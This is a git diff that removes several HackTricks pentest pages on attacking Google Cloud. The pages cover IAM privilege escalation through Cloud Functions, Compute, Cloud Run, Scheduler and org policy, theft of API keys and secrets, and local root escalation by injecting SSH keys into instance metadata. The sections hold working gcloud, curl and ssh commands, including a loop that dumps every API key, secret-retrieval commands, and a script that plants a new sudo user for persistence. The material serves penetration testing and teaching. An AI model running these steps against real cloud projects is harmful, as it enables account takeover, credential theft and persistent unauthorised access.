will have an URL similar to `gs://.artifacts..appspot.com` (The top level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)). - -## storage.objects.setIamPolicy - -You can give you permission to **abuse any of the previous scenarios of this section**. - -# storage.objects Write permission - -If you can modify or add objects in buckets you might be able to escalate your privileges to other resources that are using the bucket to store code that they execute. - -## Composer - -**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features: - -* It runs inside a **GKE cluster**, so the **SA the cluster uses is accesible** by the code running inside Composer -* It stores the **code in a bucket**, therefore, **anyone with write access over that bucket** is going to be able change/add a DGA code (the code Apache Airflow will execute)\ - Then, if you have **write access over the bucket Composer is using** to store the code you can **privesc to the SA running in the GKE cluster**. - -# References - -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md deleted file mode 100644 index 331a448f0..000000000 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md +++ /dev/null @@ -1,269 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# cloudfunctions - -## cloudfunctions.functions.create,iam.serviceAccounts.actAs - -For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance. - -The **required permissions** for this method are as follows: - -* _cloudfunctions.functions.call_ **OR** _cloudfunctions.functions.setIamPolicy_ -* _cloudfunctions.functions.create_ -* _cloudfunctions.functions.sourceCodeSet_ -* _iam.serviceAccounts.actAs_ - -The script for this method uses a premade Cloud Function that is included on GitHub, meaning you will need to upload the associated .zip file and make it public on Cloud Storage (see the exploit script for more information). Once the function is created and uploaded, you can either invoke the function directly or modify the IAM policy to allow you to invoke the function. The response will include the access token belonging to the Service Account assigned to that Cloud Function. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image12-750x618.png) - -The script creates the function and waits for it to deploy, then it runs it and gets returned the access token. - -The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions). - -## cloudfunctions.functions.update,iam.serviceAccounts.actAs - -Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if you have another one you want to get the token for**. The script will update the target function with the malicious code, then wait for it to deploy, then finally invoke it to be returned the Service Account access token. - -The following **permissions are required** for this method: - -* _cloudfunctions.functions.sourceCodeSet_ -* _cloudfunctions.functions.update_ -* _iam.serviceAccounts.actAs_ - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py). - -# compute - -## compute.instances.create,iam.serviceAccounts.actAs - -This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.** - -The following **permissions are required** for this method: - -* _compute.disks.create_ -* _compute.instances.create_ -* _compute.instances.setMetadata_ -* _compute.instances.setServiceAccount_ -* _compute.subnetworks.use_ -* _compute.subnetworks.useExternalIp_ -* _iam.serviceAccounts.actAs_ - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image9-750x594.png) - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py). - -# run - -## run.services.create,iam.serviceAccounts.actAs - -Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Account’s** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be performed to it to get the token. - -The following **permissions are required** for this method: - -* _run.services.create_ -* _iam.serviceaccounts.actAs_ -* _run.services.setIamPolicy_ **OR** _run.routes.invoke_ - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image8-1000x503.png) - -This method uses an included Docker image that must be built and hosted to exploit correctly. The image is designed to tell Cloud Run to respond with the Service Account’s access token when an HTTP request is made. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage). - -# Cloudscheduler - -## cloudscheduler.jobs.create,iam.serviceAccounts.actAs - -Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want. - -Because we control all aspects of the HTTP request being made from Cloud Scheduler, we can set it up to hit another Google API endpoint. For example, if we wanted to create a new job that will use a specific Service Account to create a new Storage bucket on our behalf, we could run the following command: - -``` -gcloud scheduler jobs create http test –schedule=’* * * * *’ –uri=’https://storage.googleapis.com/storage/v1/b?project=’ –message-body β€œ{β€˜name’:’new-bucket-name’}” –oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com –headers Content-Type=application/json -``` - -This command would schedule an HTTP POST request for every minute that authenticates as _111111111111-compute@developer.gserviceaccount.com_. The request will hit the Cloud Storage API endpoint and will create a new bucket with the name β€œnew-bucket-name”. - -The following permissions are required for this method: - -* _cloudscheduler.jobs.create_ -* _cloudscheduler.locations.list_ -* _iam.serviceAccounts.actAs_ - -To escalate our privileges with this method, we just need to **craft the HTTP request of the API we want to hit as the Service Account we pass in**. Instead of a script, you can just use the gcloud command above. - -A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing. - -# orgpolicy - -## orgpolicy.policy.set - -This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image5-1.png) - -The screenshot above shows that the _appengine.disableCodeDownload_ constraint is enforced, which means it is preventing us from downloading the source code. Using _orgpolicy.policy.set_, we can disable that enforcement and then continue on to download the source code. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py). - -# serviceusage - -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -## serviceusage.apiKeys.create - -There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys). - -The following screenshot shows how you would create an API key in the web console. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image6-1.png) - -With the undocumented API that was discovered, we can also create API keys through the API itself. - -The screenshot above shows a POST request being sent to retrieve a new API key for the project. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py). - -## serviceusage.apiKeys.list - -Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API key’s value after its creation, we can pull all the API keys in the project. - -![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image4-1.png) - -The screenshot above shows that the request is exactly the same as before, it just is a GET request instead of a POST request. This only shows a single key, but if there were additional keys in the project, those would be listed too. - -The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py). - -# apikeys - -The following permissions are useful to create and steal API keys, not this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._ - -Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges. - -## apikeys.keys.create - -This permission allows to **create an API key**: - -```bash -gcloud alpha services api-keys create -Operation [operations/akmf.p7-[...]9] complete. Result: { - "@type":"type.googleapis.com/google.api.apikeys.v2.Key", - "createTime":"2022-01-26T12:23:06.281029Z", - "etag":"W/\"HOhA[...]==\"", - "keyString":"AIzaSy[...]oU", - "name":"projects/5[...]6/locations/global/keys/f707[...]e8", - "uid":"f707[...]e8", - "updateTime":"2022-01-26T12:23:06.378442Z" -} -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh). - -## apikeys.keys.getKeyString,apikeys.keys.list - -These permissions allows **list and get all the apiKeys and get the Key**: - -```bash -gcloud alpha services api-keys create -for key in $(gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys list --uri); do - gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys get-key-string "$key" -done -``` - -You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh). - -## apikeys.keys.regenerate,apikeys.keys.list - -These permissions will (potentially) allow you to **list and regenerate all the apiKeys getting the new Key**.\ -It’s not possible to use this from `gcloud` but you probably can use it via the API. Once it’s supported, the exploitation will be similar to the previous one (I guess). - -## apikeys.keys.lookup - -This is extremely useful to check to **which GCP project an API key that you have found belongs to**: - -```bash -gcloud alpha services api-keys lookup AIzaSyD[...]uE8Y -name: projects/5[...]6/locations/global/keys/28d[...]e0e -parent: projects/5[...]6/locations/global -``` - -In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key - -# secretmanager - -## secretmanager.secrets.get - -This give you access to read the secrets from the secret manager. - -## secretmanager.secrets.setIamPolicy - -This give you access to give you access to read the secrets from the secret manager. - -# \*.setIamPolicy - -If you owns a user that has the **`setIamPolicy`** permission in a resource you can **escalate privileges in that resource** because you will be able to change the IAM policy of that resource and give you more privileges over it. - -* _cloudfunctions.functions.setIamPolicy_ - * Modify the policy of a Cloud Function to allow yourself to invoke it. - -There are tens of resources types with this kind of permission, you can find all of them in [https://cloud.google.com/iam/docs/permissions-reference](https://cloud.google.com/iam/docs/permissions-reference) searching for setIamPolicy. - -An **example** of privilege escalation abusing .setIamPolicy (in this case in a bucket) can be found here: - -{% content-ref url="../gcp-buckets-brute-force-and-privilege-escalation.md" %} -[gcp-buckets-brute-force-and-privilege-escalation.md](../gcp-buckets-brute-force-and-privilege-escalation.md) -{% endcontent-ref %} - -# Generic Interesting Permissions - -## \*.create, \*.update - -These permissions can be very useful to try to escalate privileges in resources by **creating a new one or updating a new one**. These can of permissions are specially useful if you also has the permission **iam.serviceAccounts.actAs** over a Service Account and the resource you have .create/.update over can attach a service account. - -## \*ServiceAccount\* - -This permission will usually let you **access or modify a Service Account in some resource** (e.g.: compute.instances.setServiceAccount). This **could lead to a privilege escalation** vector, but it will depend on each case. - -# References - -* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) -* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md b/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md deleted file mode 100644 index f79ceab6a..000000000 --- a/cloud-security/gcp-security/gcp-kms-and-secrets-management-enumeration.md +++ /dev/null @@ -1,76 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Crypto Keys - -[Cloud Key Management Service](https://cloud.google.com/kms/docs/) is a repository for storing cryptographic keys, such as those used to **encrypt and decrypt sensitive files**. Individual keys are stored in key rings, and granular permissions can be applied at either level. - -Having **permissions to list the keys** this is how you can access them: - -```bash -# List the global keyrings available -gcloud kms keyrings list --location global - -# List the keys inside a keyring -gcloud kms keys list --keyring [KEYRING NAME] --location global - -# Decrypt a file using one of your keys -gcloud kms decrypt --ciphertext-file=[INFILE] \ - --plaintext-file=[OUTFILE] \ - --key [KEY] \ - --keyring [KEYRING] \ - --location global -``` - -# Secrets Management - -Google [Secrets Management](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, and other sensitive data. As of this writing, it is currently in beta. - -```bash -# First, list the entries -gcloud beta secrets list - -# Then, pull the clear-text of any secret -gcloud beta secrets versions access 1 --secret="[SECRET NAME]" -``` - -Note that changing a secret entry will create a new version, so it's worth changing the `1` in the command above to a `2` and so on. - -# References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md deleted file mode 100644 index be89b20b9..000000000 --- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md +++ /dev/null @@ -1,291 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -in this scenario we are going to suppose that you **have compromised a non privilege account** inside a VM in a Compute Engine project. - -Amazingly, GPC permissions of the compute engine you have compromised may help you to **escalate privileges locally inside a machine**. Even if that won't always be very helpful in a cloud environment, it's good to know it's possible. - -# OS Patching -Depending on the privileges associated with the service account you have access to, if it has either the `osconfig.patchDeployments.create` or `osconfig.patchJobs.exec` permissions you can create a [patch job or deployment](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. - -First check all the roles the account has: - -`gcloud iam roles list` - -Now check the permissions offered by the role, if it has access to either the patch deployment or job continue. - -`gcloud iam roles describe roles/ | grep -E '(osconfig.patchDeployments.create|osconfig.patchJobs.exec)'` - - -If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch_deployment.json) for a patch job run: - -`gcloud compute os-config patch-jobs execute --file=patch.json` - - -To deploy a patch deployment: - -`gcloud compute os-config patch-deployments create my-update --file=patch.json` - -Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to detect lax permissions and automatically move laterally. - -# Read the scripts - -**Compute Instances** are probably there to **execute some scripts** to perform actions with their service accounts. - -As IAM is go granular, an account may have **read/write** privileges over a resource but **no list privileges**. - -A great hypothetical example of this is a Compute Instance that has permission to read/write backups to a storage bucket called `instance82736-long-term-xyz-archive-0332893`. - -Running `gsutil ls` from the command line returns nothing, as the service account is lacking the `storage.buckets.list` IAM permission. However, if you ran `gsutil ls gs://instance82736-long-term-xyz-archive-0332893` you may find a complete filesystem backup, giving you clear-text access to data that your local Linux account lacks. - -You may be able to find this bucket name inside a script (in bash, Python, Ruby...). - -# Custom Metadata - -Administrators can add [custom metadata](https://cloud.google.com/compute/docs/storing-retrieving-metadata#custom) at the instance and project level. This is simply a way to pass **arbitrary key/value pairs into an instance**, and is commonly used for environment variables and startup/shutdown scripts. - -```bash -# view project metadata -curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" - -# view instance metadata -curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \ - -H "Metadata-Flavor: Google" -``` - -# Modifying the metadata - -If you can **modify the instance's metadata**, there are numerous ways to escalate privileges locally. There are a few scenarios that can lead to a service account with this permission: - -_**Default service account**_\ -If the service account access **scope** is set to **full access** or at least is explicitly allowing **access to the compute API**, then this configuration is **vulnerable** to escalation. The **default** **scope** is **not** **vulnerable**. - -_**Custom service account**_\ -When using a custom service account, **one** of the following IAM permissions **is** **necessary** to escalate privileges: - -* `compute.instances.setMetadata` (to affect a single instance) -* `compute.projects.setCommonInstanceMetadata` (to affect all instances in the project) - -Although Google [recommends](https://cloud.google.com/compute/docs/access/service-accounts#associating\_a\_service\_account\_to\_an\_instance) not using access scopes for custom service accounts, it is still possible to do so. You'll need one of the following **access scopes**: - -* `https://www.googleapis.com/auth/compute` -* `https://www.googleapis.com/auth/cloud-platfo`rm - -## **Add SSH keys to custom metadata** - -**Linux** **systems** on GCP will typically be running [Python Linux Guest Environment for Google Compute Engine](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts) scripts. One of these is the [accounts daemon](https://github.com/GoogleCloudPlatform/compute-image-packages/tree/master/packages/python-google-compute-engine#accounts), which **periodically** **queries** the instance metadata endpoint for **changes to the authorized SSH public keys**. - -**If a new public** key is encountered, it will be processed and **added to the local machine**. Depending on the format of the key, it will either be added to the `~/.ssh/authorized_keys` file of an **existing user or will create a new user with `sudo` rights**. - -So, if you can **modify custom instance metadata** with your service account, you can **escalate** to root on the local system by **gaining SSH rights** to a privileged account. If you can modify **custom project metadata**, you can **escalate** to root on **any system in the current GCP project** that is running the accounts daemon. - -## **Add SSH key to existing privileged user** - -Let's start by adding our own key to an existing account, as that will probably make the least noise. - -**Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights. - -```bash -gcloud compute instances describe [INSTANCE] --zone [ZONE] -``` - -Look for a section like the following: - -``` - ... - metadata: - fingerprint: QCZfVTIlKgs= - items: - ... - - key: ssh-keys - value: |- - alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice - bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob - ... -``` - -Notice the **slightly odd format** of the public keys - the **username** is listed at the **beginning** (followed by a colon) and then again at the **end**. We'll need to match this format. Unlike normal SSH key operation, the username absolutely matters! - -**Save the lines with usernames and keys in a new text** file called `meta.txt`. - -Let's assume we are targeting the user `alice` from above. We'll **generate a new key** for ourselves like this: - -```bash -ssh-keygen -t rsa -C "alice" -f ./key -P "" && cat ./key.pub -``` - -Add your new public key to the file `meta.txt` imitating the format: - -``` -alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMMvNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJUbWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+MtDHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuhaHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice -bob:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgOGj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4vRQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbhaHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob -alice:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuMrv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsvEVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlPuxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWCxQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice -``` - -Now, you can **re-write the SSH key metadata** for your instance with the following command: - -```bash -gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt -``` - -You can now **access a shell in the context of `alice`** as follows: - -``` -lowpriv@instance:~$ ssh -i ./key alice@localhost -alice@instance:~$ sudo id -uid=0(root) gid=0(root) groups=0(root) -``` - -## **Create a new privileged user and add a SSH key** - -No existing keys found when following the steps above? No one else interesting in `/etc/passwd` to target? - -You can **follow the same process** as above, but just **make up a new username**. This user will be created automatically and given rights to `sudo`. Scripted, the process would look like this: - -```bash -# define the new account username -NEWUSER="definitelynotahacker" - -# create a key -ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P "" - -# create the input meta file -NEWKEY="$(cat ./key.pub)" -echo "$NEWUSER:$NEWKEY" > ./meta.txt - -# update the instance metadata -gcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt - -# ssh to the new account -ssh -i ./key "$NEWUSER"@localhost -``` - -## **Grant sudo to existing session** - -This one is so easy, quick, and dirty that it feels wrong… - -``` -gcloud compute ssh [INSTANCE NAME] -``` - -This will **generate a new SSH 